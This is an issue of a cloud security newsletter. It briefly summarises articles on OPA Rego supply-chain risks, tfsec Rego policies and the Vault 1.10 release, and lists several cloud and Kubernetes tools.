This week's articles
Malicious Rego: OPA Supply Chain Attacks
#attack, #opa
Rego is designed to be utilised for a very specific purpose, and thus its standard library is understandably not huge. Despite this, much like Terraform, there are still features which can be leveraged by an attacker for supply-chain attack vectors. If a consumer takes advantage of policies published by a third party, they should be aware of the following.
OPA Rego + tfsec: Custom security policies for your infrastructure
#iac, #opa
Recently, tfsec added support for applying Rego policies to your Terraform code. Clear rules can be written against simple data structures, whilst providing the developer with a wealth of information in the event of a failure, such as path, line numbers, and highlighted code snippets.
HashiCorp Vault 1.10 Released
#announcement, #vault
Vault 1.10 adds login MFA support, makes Vault an OIDC provider, adds support for PKI to use HSMs, and more.
|
|
Tools
access-undenied-aws
Access Undenied parses AWS AccessDenied CloudTrail events, explains the reasons for them, and offers actionable remediation steps. You can also refer to the companion blog post.
gke-poc-toolkit
The GKE Proof of Concept (PoC) Toolkit is a demo generator for Google Kubernetes Engine.
crfs
CRFS is a read-only FUSE filesystem that lets you mount a container image, served directly from a container registry (such as gcr.io), without pulling it all locally first.
|
|
Thanks for reading!
|
If you found this newsletter helpful, I'd really appreciate if you could forward it to your friends and colleagues! ๐ If you have questions, comments, or feedback, let me know on Twitter ( @lancinimarco / @CloudSecList), or at feedback.cloudseclist.com! Thanks, Marco
|
|
|